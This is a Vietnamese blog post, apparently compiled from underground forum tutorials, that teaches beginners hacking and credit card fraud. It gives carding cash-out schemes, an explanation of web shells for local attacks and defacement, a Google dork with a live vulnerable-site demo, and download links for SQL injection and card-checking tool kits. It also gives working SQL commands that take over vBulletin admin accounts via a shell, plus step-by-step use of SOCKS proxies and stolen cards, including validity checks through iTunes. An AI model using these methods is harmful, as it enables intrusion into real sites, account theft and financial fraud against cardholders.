18 March 2016

Hack Website newbie!


Hiện giờ em chỉ biết một số cách cash out an toàn ,gửi mọi người tham khảo.
em sẽ sắp xếp theo cấp độ từ dễ đến khó.
1/ Làm offer cc (thực chất cái này cũng là làm affiliate thôi nhưng mình làm thông qua một site offer)
Đặc điểm của cách làm này là: cần một acc paypal ver. thường thì làm offer cc thì được pay vào cuối tháng hay một ngày nào đó trong tháng nhưng site khá good :
Code:
Code:
Code:
Code:
còn nhiều nữa các bro có thể tìm thêm ở một số 4rum như kiem-tien và vietmaker
2/ làm affiliate
Cái này thì em có viết một bài rồi nhưng cũng cần nói thêm vì gần đây em mới tìm hiểu thêm một vài vấn đề mới liên quan khá thú vị
đối với cách này tốt hơn hết là các bro cần có khả năng thiết kế web và tất nhiên là phải có domain và host vì theo như em thấy thì nếu không có web thì làm hơi khó acc dễ bị die. Nếu bro nào thực sự quan tâm đến vấn đề này thì liên hệ em cùng trao đổi thêm em sẽ nói hết những gì em biết.
3/ Làm Vendor hay là merchant (tạm dịch là lái buôn)
Cái này yêu cầu bắt buộc có web site và một vài sản phẩm để bán có thể là ebook hay soft cái này gần như là thương mại điện tử cho doanh nghiệp nhưng phương thức payout lại bị hạn chế về thời gian 
như làm aff cái này em có biết một bro bán soft ở regnow nhưng chẳng bán cho ai được cả toàn là tự bán cho minh hông hà
Nhưng làm cái nì khó chơi lắm. Em có làm cách này nhưng không hứng thú lắm do bị hạn chế về thời gian pay out nó hold rất lâu thường những site cho reg acc vendor free pay vào 15th cho tháng trước đó. 
em đang nghiên cứu cách khác hay hơn và cũng là cách thứ 4 các bro có thể tham khảo các site cung cấp acc merchant 
cũng là mấy site chơi aff nhưng tìm thằng nào có phần vendor hay merchant chứ đừng reg mấy thằng publisher đó không phải là cái em đang nói.
4/ Đẳng cấp pro là đây.
Cách này cũng là merchant như phần 3 ở trên nhưng hơi khá một chút ưu điểm của cách này là pay out cực nhanh khi có order thì chỉ cần 2-3 ngày sau $$$ đã về tận bank của mình em đang ngâm cứu cách này nên không dám nói nhiều
Thứ nhất bro nào có gan và tiềm lực mạnh tìm một site nào đó làm dịch vụ đăng ký kinh doanh ở usa. sau đó mở một cái bank acc etrade. kế tiếp đăng ký google check out hoặc site merchant nào đó rồi phang thôi.
Bài này em chỉ nói sơ qua một vài cách cash out an toàn nếu muốn trao đổi thêm thì các bro pm em Y!M retryhuy em sẽ cố gắng nói hết những gì em biết nhân tiện nếu bro nào biết cách thứ 4 thì chỉ giáo thêm cho em nha thanks mọi người đã đọc bài nì
Đầu tiên tóm tắt nôm na rằng:  Shell – Là 1 công cụ cho phép bạn tấn công,
 thực thi các lệnh hay yêu cầu của bạn để tấn công, chỉnh sửa, đọc…. file, folder trên site đó, hay thậm chí là với các site trên cùng Server đó.
 Dĩ nhiên, bình thường thường thì bạn không thể có những quyền đó được đúng ko :)
Giao diện của 1 con shell: 
Ok, giờ quay lại với local attack là gì:
Ok, Google ra thì: Local = địa phương, khu vực
=> local attack => Tấn công từ trong nội bộ của máy chủ, như đã nói ở trên, mục đích của chúng ta là làm cách nào để đọc đc nội dung ở các Site khác trên cùng server
Dĩ nhiên là bạn cần có 1 con shell nằm cùng trên sv đó ( Làm thế nào để có ? Bạn có thể upload source shell từ host của bạn, có thể dùng bug để up … các vấn đề này sẽ nói sau )
Với 1 số lệnh và kĩ thuật, bạn có thể DF ( Deface – thay index của victim thành kiểu: Hacked By Tên Bạn )
Ồ :D rất hay đúng ko :) vậy chúng ta sẽ cùng học xem nhé
Tut Local Tư duy 1 :
http://www.mediafire.com/?k9a8xo26e66ck6b
Tut Local Tư duy 2 :
http://www.mediafire.com/?ktghxpz4152zhfv
Tut local BSG :
http://www.mediafire.com/?y0pd363fhen20cw
Nhìn tựa đề anh em nghe khó tin nhỉ. Nhưng sự thật là như vậy .
Tut chống chỉ định cho pro.
Linkdownload:
Code:
http://www.mediafire.com/?y6zxx5pmx6hzt2c
Google dork:
Code:
intitle:Moxiecode file browser filetype:php
Demo:
http://www.steulaliegites.com/tinymce/jscripts/tiny_mce/plugins/filemanager/frameset.php
Hack Shop:
Get 2 Table
Get 3 Table
Hack Shop CFM
Hacker Lite v1.03
Encode Decode
MD5 Cracker
Admin Finder
Admin Scanner with $ place holder
SQL Bruter v1.2
SQL InyeXion Scanner
SQLI Google Scanner
Search Shop Vulnerable v2
Check Shop via Google
Checker Tools:
Socks Checker
Checker Ccv
Mail Checker
Checker Bin
Check VBV/MCSC
Reverse IP
Paypal Account Checker v3.0
Dupe and Sort:
Remove Dupe CC
Remove Dupe Mail
Sort by Type Mail Pass
Sort by Bin Credit Card
Sort by Date Credit Card
Sort by Type Credit Card
Filter Tools:
EXP Filter
Filter CC
Word Filter
Filter Info CC
Filter Info Mail
Filter Columns
Other Tools:
Boot Traffic 3.0
edit .htaccess
Filter Pass 6 Char
Filter Pass 8 Char
World Clock
U.S Zip-Code
String - ASCII, HEX, Binary Converter
Download
:http://dl.dropbox.com/u/49340709/t00lz/public_html.zip




hướng dẫn 3 cách cơ bản để chiếm quyền admin
cách 1: change pass admin trong data
cách 2: change adminpermissions
cách 3: forget pass admin
Yêu cầu:
Có được info data của victim bao gồm:
Code:
$config['Database']['dbname'] = 'forum'; $config['MasterServer']['servername'] = 'localhost'; $config['MasterServer']['username'] = 'root'; $config['MasterServer']['password'] = '123456';
Hiểu biết sơ về câu lệnh SQL
Đầu tiên ta tôi sẽ nói cho các bạn biết về các dạng mã hóa của một vài forum thông dụng hiện nay như:
Code:
1. phpBB : md5($pass) //ko dùng salt 2. VBB : md5(md5($pass).$salt) 3. IPB : md5(md5($salt).md5($pass))
Với
-$Pass là mật khẩu ban đầu.
-$salt là 3 kí tự ngẫu nhiên mà forum tạo ra. (Mục đích: cá nhân quá mật khẩu của member trong db).
OK băt đầu thôi:
Cách 1: change pass admin trong data
Việc đầu tiên ta cần làm là tạo 1 nick trong 4rum victim
Vi dụ nick là hacker pass: 123456
Sau đó connet vào data qua shell
Ta dung lệnh :
Code:
Select * from user
Với lệnh trên thì ta có thể xem dc tất cả user trên 4rum
Nếu 4rum victim có số lượng thành viện cở hơn 3k thì ta dung lệnh :
Code:
Select password , salt from user where username='hacker'
Ta dc
Code:
Pass md5 : 5cc70df698ca01c3adb396a08b4873ad Salt: ?`Y
Q: Tại sao lại phải select from user
A: Ta cần lấy pass mã hóa md5 + salt qua nick mới reg sau đó copy lưu lại. Tips: bạn có thể lưu lại một số password đơn giản như: 123456, abcdef, 123abc để dễ dàng cho công việc hacking lần sau.
Q:Tiếp tục theo ta xác định ID của nick admin site victim. Nếu trong 4rum victim có nhiều admin ma ta ko bít admin nào có quyền superadmin hay rootadmin, 
hay admin đã thay đổi userid của rootadmin hay superadmin thì làm sao
A:Bay vào file config.php và tìm các dòng sau
Code:
$config['SpecialUsers']['canviewadminlog'] $config['SpecialUsers']['canpruneadminlog'] $config['SpecialUsers']['superadministrators']
Tìm xem userid của thằng rootadmin hay superadmin là báo nhiêu (Thưởng thì mặt đinh định là userid=1 là rootadmin)
Ta tiếp tục dùung lệnh
Code:
Select password , salt from user where userid=1
Lấy được pass md5 & salt
Vi dụ:
Code:
Pass md5 : eaf1672523371b7736282bbfc2c8b2ac Salt : 2/D
Tiếp ta dùng lệnh
Update cú pháp thì các bạn có thể tìm hiểu thêm trên google
Code:
Update user set password=’pass md5 của nick mới reg’ ,salt=’ salt của nick mới reg’ where userid=’userid của admin
Câu lệnh hoàn chỉnh như sau:
Code:
Update user set password=’ 5cc70df698ca01c3adb396a08b4873ad’ ,salt=’?`Y’ where userid=’1”
5cc70df698ca01c3adb396a08b4873ad là pass md5 của nick hacker
?`Y là salt của nick hacker
1 là userid của thằng admin
Tác dụng của câu lệnh này là
Update pass của thằng admin thành pass của nick mình
ở đây nick hacker có pass là 123456
Để kiểm tra kết quả ta vào 4rum victim đăng nhập bằng nick của thằng admin với password là 123456
Cách 2: Thay phân quyền trong table administrator
ở cách 2 thì không dài và rồm rà như cách 1 .Ta cũng connet vào data victim
dùng lệnh
Code:
update user set usergroupid =’6’ where username=’hacker’
tác dung câu lệnh này là nâng quyền cho nick hacker vào group admin
với câu lệnh này nick hacker mới chỉ là admin bình thường … vẫn chưa có toàn quyền trên site victim.
ta tiếp tực dung lệnh
Code:
select * from administrator
với câu lệnh này ta xem dc các userid , adminpermissions, cssprefs còn những table khác ta ko quan tâm
ở đây lại chia ra thêm 2 cách nhỏ:
2.a) Dùng lệnh update
Code:
Update administrator set userid=’userid của nick hacker’ where userid=’userid của admin’
Vi dú userid của nick hacker là 5 và userid của nick admin là 1 ta dung lệnh như sau
Code:
Update administrator set userid=’5’ where userid=’1’
Thế là nick hacker đã là admin có toàn quyền
2.b) Dùng lệnh INSERT
ở đây ta có info của table administrator như sau
Code:
userid : 1 adminpermissions : 491516 navprefs : NULL cssprefs :vBulletin_3_CarbonFibre2' notes : NULL dismissednews: NULL languageid : 0
câu lệnh INSERT như sau
Code:
INSERT INTO `4rum`.`administrator` (`userid`, `adminpermissions`, `navprefs`, `cssprefs`, `notes`, `dismissednews`, `languageid`) VALUES ('5', '491516', NULL, ' vBulletin_3_CarbonFibre2', NULL, NULL, '0');
Phân tích câu lệnh
INSERT INTO `4rum`.`administrator` <== INSERT vào table administrator của database tên là 4rum.
Code:
( `userid` , `adminpermissions` , `navprefs` , `cssprefs` , `notes` , `dismissednews` , `languageid` ) VALUES ( '5', '2345', NULL , ' vBulletin_3_CarbonFibre2', NULL , NULL , '0' );
<== INSERT colum userid là 5 , adminpermissions là 2345 , cssprefs là vBulletin_3_CarbonFibre2'
Với câu lệnh này ta đã insert userid của nick hacker vào admin (có toàn quyền admin)
(Nếu bạn nào ko hiểu thì có thể tim hiểu thêm trên google)
Xong thử vào admincp của 4rum đăng nhập bằng nick hacker xem thế nào
Cách 3: Forget pass admin
Cách này thì đơn gian hơn 2 cách trên
Cách thức như sau
Vào 4rum victim đặng nhập bằng nick của admin …. Pass thì đánh đại đi
Khi đăng nhâp sai VBB sẽ thông báo và xuất hiện phần nhập mail và lấy lại password
http://victim/4rum/login.php?do=lostpw
nhập email của thằng admin vào rồi nhấp ok
sau đó vào data copy password mã hóa + sail
bỏ vào tool passwordpro
cho crack ở chế độ là số và ngồi đợi …
nếu bạn nào ko muốn đợi thì làm cách này
vào data
update mail của thẳng admin thành mail của mình
khi forget thì nhập mail của mình vào….
Sau khi forget xong vào mail lấy pass


Add caption



Thông tin thêm:
Kiến thc cơ bn cho hack newbie

Nguyên liệu (Dân UG gọi thế) gồm:
Socks (Không bao giờ được thiếu trong lúc ship)
CC (Tùy shop mà CCV hay CCN) và tất nhiên là phải còn sử dụng được
Email (Để nhận thông tin từ shop mà mình ship)
Và 1 shop thích hợp
+ Kèm theo
Một trình duyệt tốt IEFF... (Bài này mình chỉ theo IE vì cái này thông dụng) - Ai không biết IE và FF là gì thì vui lòng vào Google nhé...
Và tất nhiên là một chút may mắnLed/Ped là gì?
Led chính là Canceled (Đã hủy bỏ)
Ped chính là Shipped (Đã vận chuyển)
Nếu bạn ship đồ và nhận được một email báo rằng món đồ của bạn đã Canceled (Led)thì có nghĩa là bạn đã không thành công
Còn ngược lại bạn nhận được 1 email thông báo rằng món đồ của bạn đã Shipped (Ped)thì có nghĩa là bạn đã thành công và món đồ đó đang trên đường về địa chỉ mà bạn ghi trong lúc ship
1. Socks
Phần này mình sẽ nêu cơ bản vì có một số bài viết rất chi tiết nhưng đa phần đọc qua lần đầu sẽ không hiểu và thấy không cần thiết nhiều với cấp bậc Newbie
Đầu tiên bạn mở trình duyệt của mình lên và mở trang http://ip-adress.com (chú ý chỉ có 1 chữ d trong address) và bạn sẽ thấy website sẽ nhận ra ngay bạn đang ở đâu và cho biết cả IP máy tính của bạn.
 Bạn thử tưởng tượng xem, chúng ta dùng CC của US (Mỹ) để mua đồ trên Shop US nhưng khi người ta kiểm tra lại thấy bạn mua đồ bằng máy tính ở Việt Nam --> Bạn sẽ Led ngay mà không cần phải xem xét
Socks chính là một dãy số gồm IP và Cổng (Port) có dạng như sau
71.231.10.248:3287
Phía trước dấu : (hai chấm) chính là IP Address còn phía sau là Cổng (Port)
Socks thì bạn có thể lấy ở trang Socks của FIS hoặc lấy trong một diễn đàn nào đó về UG
Cách thay socks trong IE (Internet Explorer v7)
Mở trình duyện của bạn lên, trên thanh Menu chọn Tools (Nếu không thấy thanh Menu xuất hiện thì bấm Alt nó sẽ hiện ra) sau đó chọn tiếp Internet Options
Sau đó hộp thoại Internet Options sẽ xuất hiện, các bạn chuyển qua Tab (Bảng)Connections và nhấp vào nút LAN settings
Xuất hiện bảng Local Area Network (LAN) Settings
Các bạn đánh dấu (check) vào ô Use a proxy server for your LAN (These settings will not apply to dial-up or VPN connections).
Sau đó bấm vào nút Advanced (chỉ khi check vào ô đó nút này mới có thể bấm được)
Lại xuất hiện thêm 1 hộp thoại mới mang tên Proxy Settings
Bạn có thấy khung Socks không (mũi tên màu đỏ), kế bên đó là khung Proxy address to use (mũi tên màu xanh) và kế bên là khung Port (mũi tên màu hồng) - Khoảng cách giữa 2 khung đó là dấu : (hai chấm)
Bây giờ bạn hãy nhìn lại con socks mà bạn có được (Zro sẽ lấy con socks ở phía trên là71.231.10.248:3287 ) và bắt đầu thay vào, ơ cách thay à, các bạn chỉ việc sao chép (copy) và dán (paste) vào thôi. Sau khi thay socks xong ta sẽ được như vậy:
Chú ý là đừng bỏ luôn dấu : (hai chấm) vào nhé, Okie, bây giờ thì nhấp OK -> OK -> OKcho tới khi không còn hộp thoại nào nữa và sau đó vào lại trang http://ip-adress.com (vào lại chứ từ đầu luôn) và bạn sẽ thấy ngay website báo rằng bạn đang ở US (Mỹ - Hoa Kỳ)
Cách thay socks trong Firefox
Mở trình duyệt→ công cụ→mạng→thiết lập→cấu hình proxy thủ công
* nói tóm lại đây chẳng qua thay đổi ip của US mà thôi, thủ thuật dùng proxy mà thôi
* Lưu ý: Nếu bạn gặp trường hợp không vào được trang web và thấy báo lỗi Cannot..., hãy thử nhấn Ctrl + F5 để trang được tải lại, nếu quá 3 lần mà vẫn không vào được thì có nghĩa là con socks này đã chết (die) - Bạn phải tìm một socks mới và làm lại
(Cũng có những cách kiểm tra Socks nhưng chúng tôi sẽ hướng dẫn các bạn sau)
Thế là xong phần thay đổi socks, bây giờ máy tính của bạn đã được nhận biết rằng bạn đang ở US (Có rất nhiều loại socks của các nước khác nhau, đa phần chúng ta ship đều là shop của US)
2. CC (Credit Card)
(Lưu ý ở hướng dẫn này bắt buộc các bạn đã phải thay socks thì mới có thể làm tiếp bước dưới đây)
CC thì chắc các bạn đã biết qua ở bài đầu tiên, chúng ta tìm CC ở đâu?
1. Xin của ai đó mà bạn quen biết
2. Lấy tại một diễn đàn UG nào đó ( http://darkforcevn.org )
3. Lấy tại Kho CC của FIS ( Đương nhiên bạn phải là học viên của FIS )
4. Get Shop (Tức là lấy CC ở các Shop bị lỗi bảo mật, cái này thì Newbie và Startie chưa thể làm thành thạo)

- Cách kiểm tra xem CC này đã chết (die - hết sử dụng được) hay còn live (sống - còn sử dụng được):
* Lưu ý cho tới giờ có một vài bạn cứ nghĩ rằng CC thì nhiều người sử dụng được nên khi thấy được đăng trên các Diễn đàn thì lấy và lưu lại để dành xài nhưng khi đem ra sử dụng thì led 100%
CC là thẻ tín dụng, một khi ai đó đã sử dụng thì chủ thẻ sẽ biết và sẽ khóa thẻ lại. CC cũng có 1 số tiền nhất định nên khi đã có người sử dụng thì chắc chắn tiền trong CC đó sẽ bị trừ đi, khi bạn sử dụng lại CC đó thì sẽ không còn tiền để thanh toán và thế là bạn Led
Trên Internet có rất nhiều cách kiểm tra CC live hay die nhưng ở đây chúng tôi sẽ chỉ bạn 1 cách kiểm tra cũng thông dụng và rất chính xác tuy hơi khó hơn những cách khác, đó chính là kiểm tra CC bằng phần mềm Itunes của Apple Inc.
Đầu tiên các bạn phải Tải Itunes về (Download) tại trang chủ của nóhttp://www.apple.com/itunes/download/
Nhấp vào nút Download Now để tiến hành tải Itunes về
Sau khi tải xong bạn hãy tiến hành cài đặt Itunes
Tiếp đến các bạn chạy Itunes
Sau khi mở Itunes, các bạn nhấp vào iTunes Store và chờ cho nó tải xong nhé
Sau khi mở xong các bạn phải tiến hành Đăng ký một tài khoản Itunes, việc đăng ký này yêu cầu bạn phải có 1 CCV (live) nhưng đừng lo vì sau khi đăng ký nó không die đâu .
Để đăng ký các bạn nhấp vào nút Sign In nằm góc trên bên phải của iTunes
Sau khi xuất hiện hộp thoại Sign In, các bạn bấm tiếp vào nút Create New Account để tiến hành đăng ký tài khoản iTunes
Sau 1 lúc chờ cho iTunes tải xong, một trang Quảng cáo sẽ xuất hiện, bạn hãy nhấp vàoContinue, sau đó bạn sẽ thấy xuất hiện hộp thoại bảng Qui định của nhà sản xuất, check vào khung đồng ý ( I have read and agree to the iTunes Terms and Conditions) và bấm Continue nhé (Lưu ý nếu bạn thấy tiếng Việt xuất hiện trong iTunes thì có nghĩa là bạn chưa thay socks hoặc socks bạn đã chết (die) - Bạn phải quay lại iTunes Store và kéo xuống dưới cùng để đổi thành United States, đương nhiên là bạn đã thay socks, nếu vẫn không được thì tháo bỏ iTunes và thay socks sau đó làm lại)
Và sau đó chúng ta bắt đầu điền vào những thông tin cần thiết để tạo tài khoản
Theo thứ tự từ trên xuống
Địa chỉ Email của bạn (Lưu ý phải ghi nhớ để sau này dùng để đăng nhập vào iTunes)
Mật khẩu (tự thiết lập)
Nhập lại mật khẩu (ở trên)
Câu hỏi lấy lại mật khẩu (tự đặt)
Câu trả lời (tự ghi)
Ngày tháng sinh nhật (Day - Ngày : Month - Tháng)
Sau đó bấm vào Continue nữa
Sau đó các bạn sẽ phải cần dùng đến CCV (Live - nên xin của các sư huynh đi trước và nhờ check giùm)
Đây cũng sẽ là lần đầu tiên các bạn học cách sử dụng CC, chẳng có gì khó cả, thông tin đã đầy đủ, chúng ta chỉ việc nhập vào mà thôi
* Lưu ý: Securti Code chí là Mã số bảo vệ của CC (CVV2 - CVN - CVV...)
Loại thẻ từ trái qua phải VISA - Master Card - Amex - Discover - Paypal (Cái này đừng dùng bây giờ)
Bạn chọn loại thẻ, sau đó vận dụng kiến thức đọc CC đã học ở bài trước để điền CC vào, vốn tiếng Anh của bạn cũng sẽ phát huy tốt ở bước này. ( http://google.com/translate )
Gift Cards and Certificates đừng ghi gì vào nhé, dùng Google Translate dịch ra sẽ hiểu
Salutation chọn cái nào cũng được
Sau khi hoàn tất hết các bạn kiểm tra lại và nhấp tiếp vào Continue
Nếu đăng ký thành công thì sẽ xuất hiện một bảng thông báo, còn nếu không thành công thì nó sẽ chuyển lại trang điền CC và sẽ chỉ rõ lỗi ở đâu bằng cách hiệu khung màu đỏ ở chỗ lỗi.
Đăng ký thành công thì nhấp vào chữ Done sau đó lại bấm vào nút Sign In ở góc phải trên cùng của iTunes để đăng nhập, điền vào địa chỉ Email lúc bạn đăng ký và mật khẩu rồi bấm nút Sign In
Đăng nhập xong bạn nhìn bên cột Menu bên góc phải và nhấp vào Account (Đăng nhập thành công thì nút Sign In ở trên góc phải màn hình sẽ biến thành địa chỉ Email của bạn)
Sau đó nhấp vào nút Edit Payment Information để tiến hành kiểm tra CC
Sẽ xuất hiện bảng chỉnh sửa thông tin CC, chúng ta dựa vào hệ thống của Apple Inc. để kiểm tra xem CC live hay die
Tại đây bạn có thể kiểm tra CC bằng cách chọn loại thẻ, nhập vào số thẻ (Card Number), EXP (Expires) và số CVV (Security Code) sau đó kéo xuống dưới nhấp vào nút Done - Đừng nhập bất kỳ chi tiết nào nữa như địa chỉ, bang, tên chủ thẻ nhé. Nếu CC live ( tức là sử dụng được) nó sẽ thông báo (dòng chữ màu đỏ)
Còn đây là hình ảnh nếu CC die (không còn sử dụng được nữa, bỏ đi)
Bạn đành phải tìm CC khác để kiểm tra (check) tiếp.

0 nhận xét:

Post a Comment

 

BACK TO TOP

Xuống cuối trang